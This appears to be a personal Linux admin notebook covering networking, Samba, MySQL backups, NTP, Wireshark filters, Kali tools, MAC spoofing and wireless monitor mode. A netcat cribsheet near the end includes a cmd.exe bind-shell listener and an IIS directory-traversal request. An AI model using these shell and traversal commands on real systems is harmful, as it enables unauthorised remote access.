$ENV{'DATE_LOCAL'}\n"; print "DATE_GMT = $ENV{'DATE_GMT'}\n"; print "LAST_MODIFIED = $ENV{'LAST_MODIFIED'}\n";
# nano /etc/network/interfaces
Edit the file similiar to the following:
auto eno1 iface eno1 inet static address 10.32.10.64 netmask 255.255.255.0 gateway 10.32.10.1 dns-nameservers 8.8.8.8 dns-nameservers 4.4.4.4
Save the file and then edit /etc/resolv.conf like this:
# nano /etc/resolv.conf nameserver 8.8.8.8 # Replace with your nameserver ip nameserver 4.4.4.4 # Replace with your nameserver ip
Restart the networking on your system with:
# systemctl restart network [On SystemD]
//myserver/myfolder /mnt/backup cifs credentials=home/myfolder/.Smbcredentials
The .Smbcredentials file is:
contents of .Smbcredentials file: username=myaccount password=mypassword domain=mydomain
Permissions on cred file:
$ sudo ls -l /etc/smb_credentials.txt -rw-------. 1 root root 54 Mar 24 13:19 /etc/smb_credentials.txt
Change security type:
$ sudo mount -t cifs //172.16.1.5/myshare/ /mnt/myshare \ -osec=ntlmv2,domain=MYDOMAIN,username=myusername,password=mypassword
if [ ".id -u." -eq 0 ]; then PS1="\[\033[m\]|\[\033[1;35m\]\t\[\033[m\]|\[\e[1;31m\]\u\[\e [1;36m\]\[\033[m\]@\[\e[1;36m\]\h\[\033[m\]:\[\e[0m\]\[\e[1;32m\] [\W]> \[\e[0m\]" else PS1="\[\033[m\]|\[\033[1;35m\]\t\[\033[m\]|\[\e[1m\]\u\[\e[1;36m\] \[\033[m\]@\[\e[1;36m\]\h\[\033[m\]:\[\e[0m\]\[\e[1;32m\][\W]> \[\e[0m\]" fi
RCol='\033[0m' Gre='\033[32m'; Red='\033[31m'; Blu='\033[34m'; Yel='\033[33m'; PS1="${RCol}[\.if [ \$? = 0 ]; then echo "${Gre}"; else echo "${Red}"; fi\.\t\[${Rcol}\] \[${Blu}\]\h\[${RCol}\] \[${Yel}\]\w\[${RCol}\]]\n$ "
.bashrc as of 12.20.2020 15:09:13
---Start--- # ~/.bashrc: executed by bash(1) for non-login shells. # see /usr/share/doc/bash/examples/startup-files (in the package bash-doc) # for examples # If not running interactively, don't do anything case $- in *i*) ;; *) return;; esac # don't put duplicate lines or lines starting with space in the history. # See bash(1) for more options HISTCONTROL=ignoreboth # append to the history file, don't overwrite it shopt -s histappend # for setting history length see HISTSIZE and HISTFILESIZE in bash(1) HISTSIZE=10000 HISTFILESIZE=20000 # check the window size after each command and, if necessary, # update the values of LINES and COLUMNS. shopt -s checkwinsize # If set, the pattern "**" used in a pathname expansion context will # match all files and zero or more directories and subdirectories. #shopt -s globstar # make less more friendly for non-text input files, see lesspipe(1) [ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)" # set variable identifying the chroot you work in (used in the prompt below) if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then debian_chroot=$(cat /etc/debian_chroot) fi # set a fancy prompt (non-color, unless we know we "want" color) case "$TERM" in xterm-color|*-256color) color_prompt=yes;; esac # uncomment for a colored prompt, if the terminal has the capability; turned # off by default to not distract the user: the focus in a terminal window # should be on the output of commands, not on the prompt #force_color_prompt=yes if [ -n "$force_color_prompt" ]; then if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then # We have color support; assume it's compliant with Ecma-48 # (ISO/IEC-6429). (Lack of such support is extremely rare, and such # a case would tend to support setf rather than setaf.) color_prompt=yes else color_prompt= fi fi if [ "$color_prompt" = yes ]; then PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\] :\[\033[01;34m\]\w\[\033[00m\]\$ ' else PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ ' fi unset color_prompt force_color_prompt # If this is an xterm set the title to user@host:dir case "$TERM" in xterm*|rxvt*) PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1" ;; *) ;; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ]; then test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)" alias ls='ls --color=auto' #alias dir='dir --color=auto' #alias vdir='vdir --color=auto' alias grep='grep --color=auto' alias fgrep='fgrep --color=auto' alias egrep='egrep --color=auto' fi # colored GCC warnings and errors #export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32: locus=01:quote=01' # some more ls aliases alias ll='ls -alF' alias la='ls -A' alias l='ls -CF' # Add an "alert" alias for long running commands. Use like so: # sleep 10; alert alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/ [;&|]\s*alert$//'\'')"' # Alias definitions. # You may want to put all your additions into a separate file like # ~/.bash_aliases, instead of adding them here directly. # See /usr/share/doc/bash-doc/examples in the bash-doc package. if [ -f ~/.bash_aliases ]; then . ~/.bash_aliases fi # enable programmable completion features (you don't need to enable # this, if it's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc). if ! shopt -oq posix; then if [ -f /usr/share/bash-completion/bash_completion ]; then . /usr/share/bash-completion/bash_completion elif [ -f /etc/bash_completion ]; then . /etc/bash_completion fi fi RCol='\033[0m' Gre='\033[32m'; Red='\033[31m'; Blu='\033[34m'; Yel='\033[33m'; PS1="${RCol}[\.if [ \$? = 0 ]; then echo "${Gre}"; else echo "${Red}"; fi\.\t\[${Rcol}\] \[${Blu}\]\h\[${RCol}\] \[${Yel}\]\w\[${RCol}\]]\n$ "
The while loop runs infinite. The for loop runs trough each character of the string given in $chars. echo prints the character, with a carriage return \r, but without linebreak -n. -e forces echo to interpret escape sequences such as \r. There's a delay of 0.5 seconds between each change.
#!/bin/bash chars="/-\|" while :; do for (( i=0; i<${#chars}; i++ )); do sleep 0.5 echo -en "${chars:$i:1}" "\r" done done
Here's an example using \b, which tells the terminal emulator to move the cursor one column to the left, in order to keep overwriting the same character over and over.
#!/usr/bin/env bash spinner() { local i sp n sp='/-\|' n=${#sp} printf ' ' while sleep 0.1; do printf "%s\b" "${sp:i++%n:1}" done } printf 'Doing important work ' spinner & sleep 10 # sleeping for 10 seconds is important work kill "$!" # kill the spinner printf '\n'
Add the Kali repository
First update the apt database
Get the Kali key
wget 'https://archive.kali.org/archive-key.asc'
Then add it to my system
Run another update, but do not run the upgrade at this point.
Now we need to set the correct priority for packages from Kali Linux repositories: they will have a lower priority than the others, as a result, Kali Linux packages (for example, kernels) will not be installed automatically, but manually you can install any packages that you need.
sudo sh -c "echo 'Package: *'>/etc/apt/preferences.d/kali.pref; echo 'Pin: release a=kali-rolling'>>/etc/apt/preferences.d/kali.pref; echo 'Pin-Priority: 50'>>/etc/apt/preferences.d/kali.pref"
Update again
sudo apt update
The problem will be that some kali package has dependencies, these dependencies are present in the Kali Linux repositories, but something prevents the apt program from installing them.
Therefore, to install Kali Linux packages, we will use aptitude in a command of the form:
sudo aptitude install -t kali-rolling PACKAGE-NAME
sudo aptitude install -t kali-rolling exploitdb-papers
It is not recommended to install drivers and kernel modules from the Kali Linux repository
sudo sh -c "echo 'deb https://http.kali.org/kali kali-rolling main non-free contrib' > /etc/apt/sources.list.d/kali.list"
https://miloserdov.org/?p=3609
To install:
sudo apt update && apt -y install exploitdb
Note that the exploits are in /opt/exploitdb/
Regardless of how you installed SearchSploit, all you need to do in order to update it is run the following:
$ searchsploit -u
Do not use abbreviations.
Use the -p option to get more info about a specific exploit and to copy the path to the clipboard
Use the -m parameter to copy an exploit to the current directory.
Use the -w parameter to list the URL to the exploits.
$ netdiscover -i eno1
$ sudo netdiscover -h Netdiscover 0.3-pre-beta7 [Active/passive arp reconnaissance tool] Written by: Jaime Penalba <jpenalbae@gmail.com> Usage: netdiscover [-i device] [-r range | -l file | -p] [-m file] [-s time] [-n node] [-c count] [-f] [-d] [-S] [-P] [-c] -i device: your network device -r range: scan a given range instead of auto scan. 192.168.6.0/24,/16,/8 -l file: scan the list of ranges contained into the given file -p passive mode: do not send anything, only sniff -m file: scan the list of known MACs and host names -F filter: Customize pcap filter expression (default: "arp") -s time: time to sleep between each arp request (milliseconds) -n node: last ip octet used for scanning (from 2 to 253) -c count: number of times to send each arp reques (for nets with packet loss) -f enable fastmode scan, saves a lot of time, recommended for auto -d ignore home config files for autoscan and fast mode -S enable sleep time supression between each request (hardcore mode) -P print results in a format suitable for parsing by another program -N Do not print header. Only valid when -P is enabled. -L in parsable output mode (-P), continue listening after the active scan is completed If -r, -l or -p are not enabled, netdiscover will scan for common lan addresses.
[13:57:07 benb ~/CCCC/Tech/PluggedIn] $ sudo netdiscover [sudo] password for ben: Currently scanning: 192.168.76.0/16 | Screen View: Unique Hosts 10 Captured ARP Req/Rep packets, from 9 hosts. Total size: 510 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.1.94 bc:a5:11:99:2e:38 1 42 Unknown vendor 192.168.1.65 a4:8d:3b:1f:e8:53 1 60 Vizio, Inc 192.168.1.70 5c:87:9c:7b:3d:6f 1 60 Unknown vendor 192.168.1.68 d8:31:34:68:77:af 1 42 Unknown vendor 192.168.1.154 c8:52:61:97:05:b2 1 60 Unknown vendor 192.168.1.135 7c:dd:90:eb:f3:2e 1 60 Shenzhen Ogemray Technology Co., Ltd. 192.168.1.150 7c:dd:90:eb:f3:2e 1 60 Shenzhen Ogemray Technology Co., Ltd. 192.168.1.148 00:13:46:e4:48:61 1 42 D-Link Corporation 192.168.1.254 c8:52:61:97:05:b0 2 84 Unknown vendor
sudo -H -u otheruser bash -c 'echo "I am $USER, with uid $UID"' sudo -H -u mysql bash -c 'cat myfile.txt' sudo -H -u clamav bash -c 'ls -tor' sudo -H -u backup bash -c 'ls /sbin'
# select mac, COUNT(*) from inventory group by mac ; # select ip, COUNT(*) from inventory group by ip ; # select ip, COUNT(*) from inventory group by ip HAVING COUNT(*) >= 1 order by count(*); # select ip, COUNT(*) from inventory group by count(*) having COUNT(*) >= 1 ;
Cisco Transceiver MGE Form-Factor Pluggable (SFP) Interface Converter
The Cisco MGBSX1 Transceiver MGE Small Form-Factor Pluggable (SFP) or mini Gigabit Interface Converter (mini-GBIC) is an easy-to-install module that provides a simple way to add fiber connectivity to Cisco 100, 200, 300, and 500 Series switches. The MGBSX1 transceiver is available for single-mode or multimode fiber-optic cabling and can support distances from 100 meters up to 40 kilometers.
Cisco MGBSX1 SFP Transceiver, Gigabit Ethernet (GbE) 1000BASE-SX Mini-GBIC (MGBSX1) at Amazon
When apt update throws errors like:
GPG error: http://dl.google.com/linux/earth/deb stable Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 78BD65473CB3BD13
Use the following to update/sign the keys in question;
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 648ACFD622F3D138 sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 78BD65473CB3BD13
There are many ways of installing CPAN modules but the easiest is to use cpanm. If you are going to be working with Perl, you really should install it:
sudo apt-get install cpanminus
Then, install your module:
cpanm install Net::pcap
Alternatively, you can install with:
perl -MCPAN -e 'install Net::pcap'
$ tcpstat -h tcpstat version 1.5 usage: tcpstat [-?haeFlp] [-b bps] [-B bps] [-f filter expr] [-i interface] [-o output] [-R seconds] [-r filename] [-s seconds] [interval] -?, -h - display this help -a - accounting mode -b bps - bandwidth mode, where bps is bits/second -B bps - dumb bandwidth mode, where bps is bits/second -e - do not print empty intervals -F - flush stdout after printing each line -f filter expr - packet filter expression (like in tcpdump) -i interface - do live capture on [interface], not from file -l - include linklayer in packet size calc -o output - format for the output of stats (see manpage) -p - non-promiscuous mode when doing live capture -R seconds - display time relative to [seconds] -r filename - read data from [filename] -s seconds - capture only [seconds] long (-1 is infinite) interval - time interval (seconds) for taking samples
$ msend -h msend version 2.3 Usage: msend [-g GROUP] [-p PORT] [-join] [-i ADDRESS] [-t TTL] [-P PERIOD] [-text "text"|-n] msend [-v | -h] -g GROUP IP multicast group address to send to. Default: 224.1.1.1 -p PORT UDP port number used in the multicast packets. Default: 4444 -i ADDRESS IP address of the interface to use to send the packets. The default is to use the system default interface. -join Multicast sender will join the multicast group. By default a sender never joins the group. -P PERIOD Interval in milliseconds between packets. Default 1000 msec -t TTL The TTL value (1-255) used in the packets. You must set this higher if you want to route the traffic, otherwise the first router will drop the packets! Default: 1 -text "text" Specify a string to use as payload in the packets, also displayed by the mreceive command. Default: empty -n Encode -text argument as a number instead of a string. -v Print version information. -h Print the command usage. $ mreceive -h mreceive version 2.3 Usage: mreceive [-g GROUP] [-p PORT] [-i ADDRESS ] ... [-i ADDRESS] [-n] mreceive [-v | -h] -g GROUP IP multicast group address to listen to. Default: 224.1.1.1 -p PORT UDP port number used in the multicast packets. Default: 4444 -i ADDRESS IP addresses of one or more interfaces to listen for the given multicast group. Default: the system default interface. -n Interpret the contents of the message as a number instead of a string of characters. Use this with .msend -n. -v Print version information. -h Print the command usage.
$ sudo perl igmp-querier.pl Sending querier packet
cat /var/log/igmp.log
auditd notes
sudo apt-get install auditd sudo chkconfig auditd on sudo vi /etc/audit/audit.rules sudo service auditd restart
The following command checks if /etc/passwd has been accessed by anyone. As shown in the above example audit configuration, auditd checks if /etc/passwd is modified or tampered with using chmod. sudo ausearch -f /etc/passwd
sudo auditctl -l aureport --help
First of all, you can filter an input pcap file based on start time and/or end time. -A <start-time> and -B <end-time> options are used to capture only those packets whose arrival time falls within a specific time range (e.g., between 2:30pm and 2:35pm). The time format to use is YYYY-MM-DD HH:MM:SS.
$ editcap -A '2014-12-10 10:11:01' -B '2014-12-10 10:21:01' input.pcap output.pcap
editcap can be also useful if you want to split a large pcap file into multiple smaller pcap files.
To split a pcap file into multiple pcap files of the same packet count:
$ editcap -c <packets-per-file> <input-pcap-file> <output-prefix>
Each output pcap file will have the same packet count, and be named as <output-prefix>-NNNN.
Example 6: Extract packets between a specific timeperiod using option -A and -B
This example create the output_dump, which contains the packets that are captured between the time mentioned in option A and the time mentioned in option B.
# editcap -v -A "2009-02-11 11:26:30" -B "2009-02-11 11:27:00" input_dump output_dump
# editcap -v -A "2021-03-28 11:55:00" -B "2021-03-28 12:15:00" 032821.1206.cap 032821.1206.Slice.1155-1215.cap
Example 10: Divide input_dump file into multiple files using option -c
Divide the single dump into multiple file and each contains specified number of packets.
# editcap -v -c 1000 input_dump output
To ensure all timestamps are in strict chronological order:
editcap -S 0 capture.pcapng adjusted.pcapng
To remove duplicate packets seen within the prior four frames use:
editcap -d capture.pcapng dedup.pcapng
To remove duplicate packets seen within the prior 100 frames use:
editcap -D 101 capture.pcapng dedup.pcapng
The IANA index of assignments for protocols (https://www.iana.org/protocols)
IPv4 Multicast Address Space Registry (https://www.iana.org/assignments/multicast-addresses/multicast-addresses.xhtml)
This command is a very little known secret of Samba. It returns IP adresses of all Samba servers in one's own broadcast domain:
nmblookup __SAMBA__
nmblookup -S CAPCITY
Very cool
Another way to do this is via Avahi (Bonjour), as long as the servers are publishing:
avahi-browse -r _smb._tcp
[15:48:34 benb ~/Spells/enum4linux-master] $ smbtree WORKGROUP CHURCH \\VOLUNTEER \\VOLUNTEER\print$ Printer Drivers \\VOLUNTEER\IPC$ Remote IPC CAPCITY \\STAFFSRV bkupsrv server (Samba, Ubuntu) \\STAFFSRV\HP_Officejet_5740_series_710C28_ HP_Officejet_5740_series_710C28_ \\STAFFSRV\IPC$ IPC Service (bkupsrv server (Samba, Ubuntu)) \\STAFFSRV\print$ Printer Drivers \\STAFFSRV\bkupsrv Backup Server \\STAFF CCCC Staff Server \\MEDIA CCCC Media Server \\MEDIA\Users \\MEDIA\Media H Bios lists as 00:05 - in slot 6 - 2TB drive installed on 02/23/2014 \\MEDIA\Media G Bios lists as 00:04 - in slot 5 - installed 02/23/2014 \\MEDIA\K$ Default share \\MEDIA\IPC$ Remote IPC \\MEDIA\H$ Default share \\MEDIA\G$ Default share \\MEDIA\F$ Default share \\MEDIA\E$ Default share \\MEDIA\E \\MEDIA\C$ Default share \\MEDIA\ADMIN$ Remote Admin \\CCCCNAS \\BENB Samba 4.7.6-Ubuntu \\BENB\Ricoh-MP-C4504ex Ricoh MP C4504ex \\BENB\OfficeRicoh Ricoh MP C4504ex \\BENB\IPC$ IPC Service (Samba 4.7.6-Ubuntu) \\BENB\print$ Printer Drivers
sudo mysqldump -u root -p inventory > ~/bkup/mysql/inventoryDB.20210406.sql sudo mysqldump -u root -p people > ~/bkup/mysql/peopleDB.20210406.sql
Backup an entier database (inventory or people)
$ mysqldump -u root -p –databases inventory people > ~/sakila_employees_20210406.sql
Restoring a MySQL database using mysqldump is simple. To restore the database, you must create an empty database. First, let us drop and recreate the sakila database by executing the following command.
mysql> drop database sakila; Query OK, 24 rows affected (0.35 sec) mysql> create database sakila; Query OK, 1 row affected (0.01 sec)
When you restore the database, instead of using mysqldump, you must use mysql; otherwise, the mysqldump will not generate the schema and the data. Execute the following command to restore the sakila database:
mysql -u root -p sakila < C:\MySQLBackup\sakila_20210406.sql
Once command executes successfully, execute the following command to verify that all objects have been created on the sakila database.
mysql> use sakila; Database changed mysql> show tables;
Restore a specific table in the database
For instance, someone dropped a table from the database. Instead of restoring the entire database, we can restore the dropped table from the available backup. To demonstrate, drop the actor table from the sakila database by executing the following command on the MySQL command-line tool.
mysql> use sakila; Database changed mysql> drop table actor;
To restore the actor table, perform the following step by step process.
Step 1 : Create a dummy database named sakila_dummy and restore the backup of the sakila database on it. Following is the command.
mysql> create database sakila_dummy; mysql> use sakila_dummy; mysql> source C:\MySQLBackup\sakila_20210406.sql
Step 2: Backup the actor table to sakila_dummy_actor_20210406.sql file. Following is the command
C:\Users\Nisarg> mysqldump -u root -p sakila_dummy actor > C:\MySQLBackup\sakila_dummy_actor_20210406.sql
Step 3: Restore the actor table from the “sakila_dummy_actor_20210406.sql” file. Following is the command on the MySQL command-line tool.
mysql> source C:\MySQLBackup\sakila_dummy_actor_20210406.sql
Execute the following command to verify the table has been restored successfully.
$ ip addr show $ ip link set eno1 down $ ip link set eno1 up $ vi /etc/netplan/*.yaml or $ sudo nano 1-network-manager-all.yaml network: ethernets: eno1: addresses: [192.168.1.13/24] gateway4: 192.168.1.1 dhcp4: true optional: true nameservers: addresses: [8.8.8.8,8.8.4.4] version: 2
And then to apply the configuration, you run:
$ netplan apply $ sudo ifconfig eno1 192.168.0.64 netmask 255.255.255.0 $ sudo route add default gw 192.168.0.239 eno1
https://danielmiessler.com/study/manually-set-ip-linux/#ip
route add -net 192.168.0.239 netmask 255.255.255.0 metric 1024 dev eno0
ffmpeg -i inputfile.m4a -c:a libmp3lame -ac 2 -b:a 320k outputfile.mp3 $ mkdir newfiles $ for f in *.m4a; do ffmpeg -i "$f" -codec:v copy -codec:a libmp3lame -q:a 2 newfiles/"${f%.m4a}.mp3"; done $ mkdir newfiles $ for f in *.m4a; do ffmpeg -i "$f" -codec:v copy -codec:a libmp3lame -q:a 2 newfiles/"${f%.m4a}.mp3"; done ffmpeg -i show.m4a -c:a libmp3lame -q:a 8 output.mp3 ffmpeg -i inputfile.m4a -acodec libmp3lame -ab 93k outputfile.mp3
wlp2s0 c0:f8:da:79:de:fc wlx7cdd90ebf32e 7c:dd:90:eb:f3:2e [11:42:21 benb ~] $ sudo macchanger -rb wlx7cdd90ebf32e Current MAC: 7c:dd:90:eb:f3:2e (Shenzhen Ogemray Technology Co., Ltd.) Permanent MAC: 7c:dd:90:eb:f3:2e (Shenzhen Ogemray Technology Co., Ltd.) New MAC: 14:fc:eb:e6:a5:94 (unknown) [11:42:41 benb ~] $ sudo ifconfig wlx7cdd90ebf32e up [11:48:17 benb ~] $ sudo ifconfig wlx7cdd90ebf32e wlx7cdd90ebf32e: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 1500 inet 192.168.1.151 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 fe80::2aa8:73f4:ceb5:3b75 prefixlen 64 scopeid 0x20 ether 14:fc:eb:e6:a5:94 txqueuelen 1000 (Ethernet) RX packets 1178 bytes 536680 (536.6 KB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 512 bytes 78285 (78.2 KB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 [11:52:38 benb ~] $ sudo airmon-ng start wlx7cdd90ebf32e Found 5 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to run 'airmon-ng check kill' PID Name 1008 NetworkManager 1009 wpa_supplicant 4977 dhclient 5030 avahi-daemon 5034 avahi-daemon PHY Interface Driver Chipset phy0 wlp2s0 wl Broadcom Inc. and subsidiaries BCM43228 802.11a/b/g/n phy1 wlx7cdd90ebf32e rt2800usb Ralink Technology, Corp. RT5572 Interface 15mon is too long for linux so it will be renamed to the old style (wlan#) name. (mac80211 monitor mode vif enabled on [phy1]wlan0mon (mac80211 station mode vif disabled for [phy1]wlx7cdd90ebf32e) [15:07:43 benb ~] $ sudo airmon-ng check kill Killing these processes: PID Name 935 wpa_supplicant 6427 avahi-daemon 6428 avahi-daemon [15:07:53 benb ~] [11:54:23 benb ~] $ sudo airmon-ng start wlx7cdd90ebf32e Found 2 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to run 'airmon-ng check kill' PID Name 5703 avahi-daemon 5704 avahi-daemon PHY Interface Driver Chipset phy1 wlan0mon rt2800usb Ralink Technology, Corp. RT5572 phy0 wlp2s0 wl Broadcom Inc. and subsidiaries BCM43228 802.11a/b/g/n [11:54:26 benb ~] $ sudo nano /etc/kismet/kismet.conf Change the "ncsource" variable to equal "wlan1mon" without quotes. Save the change.
Edit /etc/ntp.conf using your favorite text editor. Remove or comment out any lines starting with server, to prevent your machine from trying to mix smeared and non-smeared servers. Add the lines: server time1.google.com iburst server time2.google.com iburst server time3.google.com iburst server time4.google.com iburst Restart the NTP daemon using sudo service ntp reload. https://developers.google.com/time/guides Also time-a.timefreq.bldrdoc.gov sudo nano /etc/ntp.conf # Use servers from the NTP Pool Project. Approved by Ubuntu Technical Board # on 2011-02-08 (LP: #104525). See http://www.pool.ntp.org/join.html for # more information. server 0.ubuntu.pool.ntp.org server 1.ubuntu.pool.ntp.org server 2.ubuntu.pool.ntp.org server 3.ubuntu.pool.ntp.org sudo iptables -A INPUT -m state --state NEW -p tcp --dport 123 -j ACCEPT sudo ufw allow 123/tcp sudo service ntp reload or sudo service ntp restart ntpdate -s 192.168.1.100 sudo ntpq -c lpeer sudo tail -f /var/log/syslog https://www.unixmen.com/syncronise-time-ntp-server-ubuntu-mintdebian/ and https://tecadmin.net/setup-time-synchronisation-ntp-server-on-ubuntu-linuxmint/
Make sure that your interface is down and you are running macchanger as a root user. First we need to take down the network adapter in order to change the MAC address. This can be done using the following command:
ifconfig wlan1 down Now use the following command to change your MAC address to a new random MAC Address: macchanger -r wlan1 Mimic being the burned in MAC: macchange -b Change only the host portion, not the vendor portion of the MAC. macchanger -e wlan0 Use the following command to restore the permanent MAC address to your network adapter manually: macchanger –permanent wlan1 You can also spoof a particular MAC address using the following command: macchanger -m [Spoofing MAC Address] wlan1 macchanger -m XX:XX:XX:XX:XX:XX wlan1 Use the following command to bring up your network adapter with the new MAC address: ifconfig wlan1 up Use the following command to show the current MAC address: macchanger –show wlan1 Example of production command: sudo macchanger -m 10:40:f3:ec:85:2f eth0 sudo macchanger -m e8:8d:28:20:64:32 eth0 /etc/init.d/networking stop ifconfig eth0 hw ether 02:01:02:03:04:08 /etc/init.d/networking start place the following in the appropriate section of /etc/network/interfaces (within an iface stanza, e.g., right after the gateway line) so that the MAC address is set when the network device is started: hwaddress ether 02:01:02:03:04:08 To change MAC address during boot time with MACChanger, add the following line to your /etc/network/interfaces (example for the eth0 interface): pre-up macchanger -m 12:34:56:78:90:AB eth0 In order to change the MAC address of any interface, you must bring down the that particular interface before changing it. ifconfig wlan0wan down macchanger -m 00:11:22:33:44:55 wlan0wan So here is what I want to do: Show the current settings sudo macchanger -s wlan0 First take the device down sudo ifconfig wlan0 down Change MAC on the fly to something completely random sudo macchanger -r -b wlan0 Change MAC on the fly to something random while retaining the vendor portion sudo macchanger -e -b wlan0 Make change permenent sudo macchanger -e -b wlan0 Set to specific MAC sudo macchanger --mac=XX:XX:XX:XX:XX:XX eth0 sudo macchanger --mac=fc:f8:ae:26:86:ee eth0
exiftool -r -ext jpg . -ee -p '$gpslatitude, $gpslongitude' Warning: [Minor] Tag 'gpslatitude' not defined - 2006_NSAA_IT_Award1s.jpg 38 deg 10' 1.00" N, 84 deg 55' 19.00" W 38 deg 11' 5.22" N, 84 deg 49' 4.26" W Warning: [Minor] Tag 'gpslatitude' not defined - Feb242014 016.jpg 38 deg 11' 24.00" N, 84 deg 50' 3.00" W exiftool -r -ee -p '$gpslatitude, $gpslongitude' ./Tech/Inventory/NetGateBack.jpg $ cd [15:08:59 benb ~] $ cd CCCC/ [15:09:00 benb ~/CCCC] $ exiftool -r -ext jpg . -ee -p '$gpslatitude, $gpslongitude'
This is a cribsheet I had started, but should be included here; CribSheet Updated: 04.13.2021 14:42:05 This is intended to be a very concise list of command line examples for reference. TheRedPill is intended to be much more detailed. This file will simply remind me of commands and examples of their basic use. Search this file for keywords to identify the command you are looking for. Use -h, --help, man, and apropos for more information regarding any tool or app. ---[netcat]--- $ nc -h [syntax help screen] $ nc -v -v -z -w2 127.0.0.1 1-139 [scan tcp ports 1-139] $ nc -v -v -z -w2 127.0.0.1 21 25 80 139 [scan only tcp ports 25, 60 and 139] $ nc -u -v -v -z -w2 127.0.0.1 21 1-139 [scan udp ports 1-139] UDP scans on NT do not work $ nc -L -d -e cmd.exe -p 8080 [start the listener, and provide a console shell] $ nc HostIPAddress ListeningPortNumber [to connect to a listening port] $ nc -v -v -z -w2 -n -p 53 127.0.0.1 80 [Send from Port 53, scan port 80, no name resolution] Setup a listener $ nc -v -v -l -d -e cmd.exe -p 5000 Get the shell $ nc -v -v 127.0.0.1 5000 You can use nc to pull banners. $ nc 127.0.0.1 80 HEAD / HTTP/1.0 $ nc 127.0.0.1 80 (enter once) GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0 List established socket connections $ sudo netstat -atnp | grep ESTABLISHED List established services pretty $ sudo netstat -atnp | grep "ESTABLISHED\|LISTEN" | awk '{printf "%-25s %-10s %-25s %-20s\n",$7,$1,$4,$5}' | sed /^-/d | sed 's/\// /g' Find out which process is actually listening on that port $ sudo fuser -v 631/tcp Display current MAC address $ macchanger -s wlp2s0 Change the MAC address to a random address $ sudo macchanger -A wlp2s0 $ sudo ifconfig wlp2s0 up $ ifconfig wlp2s0 Reset the interface to the original MAC address $ sudo macchanger -p wlp2s0
Show only SMTP (port 25) and ICMP traffic: tcp.port eq 25 or icmp Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet: ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16 Capture only traffic to or from IP address 172.18.5.4: host 172.18.5.4 Capture traffic to or from a range of IP addresses: net 192.168.0.0/24 net 192.168.0.0 mask 255.255.255.0 Capture only DNS (port 53) traffic: port 53 Capture except all ARP and DNS traffic: port not 53 and not arp For bad TCP you could try to work with the filter tcp.analysis.flags all packets from/to the IP address 192.0.73.2, but that are error packets ip.addr==192.0.73.2 and expert.severity==error. TCP buffer full -- Source is instructing Destination to stop sending data tcp.window_size == 0 && tcp.flags.reset != 1 https://www.wireshark.org/docs/dfref/ ip.addr == x.x.x.x ip.dst == x.x.x.x ip.src == x.x.x.x ip.addr == x.x.x.x && ip.addr == x.x.x.x http or dns tcp.port==xxx ip.addr == 10.0.0.0/24 !(ip.addr == 10.43.54.65) ip.addr == 10.43.54.0/24 tcp.dstport == 25 ip.addr == 10.43.54.65 and Tcp.port == 25 tcp.flags.ack == 1 tcp.flags.syn == 1 arp icmp sip ldap malformed dns igmp eth.dst == ff:ff:ff:ff:ff:ff eth.addr == 00:70:f4:23:18:c4 (eth.dst[0] & 1) # Wireshark Multicast Filter bootp (dhcp) wlan.ssid == SSID !(arp or icmp or dns) Designed to filter out certain types of protocols, it masks out arp, icmp, dns, or other protocols you think are not useful. This will allow you to focus of what traffic interests you. https://www.wireshark.org/docs/dfref/ https://medium.com/hacker-toolbelt/wireshark-filters-list-983c49468a45 https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/
[ 19.008913] iwlwifi 0000:06:00.0: Detected RF HR B3, rfid=0x10a100 [ 19.076661] iwlwifi 0000:06:00.0: base HW address: b0:7d:64:e7:ba:a3 [ 19.102180] NET: Registered PF_QIPCRTR protocol family [ 19.256570] usb 1-4: 88XXau 00:c0:ca:b1:5c:55 hw_info[107] [ 19.262972] usbcore: registered new interface driver rtl88XXau [ 19.573295] r8169 0000:05:00.0: firmware: direct-loading firmware rtl_nic/rtl8168h-2.fw [ 19.601071] Generic FE-GE Realtek PHY r8169-0-500:00: attached PHY driver (mii_bus:phy_addr=r8169-0-500:00, irq=MAC)1 [ 19.811205] r8169 0000:05:00.0 eth0: Link is Down) [ 21.452963] IPv6: ADDRCONF(NETDEV_CHANGE): wlan1: link becomes ready [ 25.224153] wlan0: authenticate with c8:52:61:97:05:b0 [ 25.230603] wlan0: send auth to c8:52:61:97:05:b0 (try 1/3) [ 25.393295] wlan0: send auth to c8:52:61:97:05:b0 (try 2/3) [ 25.497293] wlan0: send auth to c8:52:61:97:05:b0 (try 3/3) [ 25.601116] wlan0: authentication with c8:52:61:97:05:b0 timed out [ 27.157795] wlan0: authenticate with c6:52:61:97:05:b3 [ 27.162410] wlan0: send auth to c6:52:61:97:05:b3 (try 1/3) [ 27.289776] wlan0: authenticated [ 27.293324] wlan0: associate with c6:52:61:97:05:b3 (try 1/3) [ 27.297383] wlan0: RX AssocResp from c6:52:61:97:05:b3 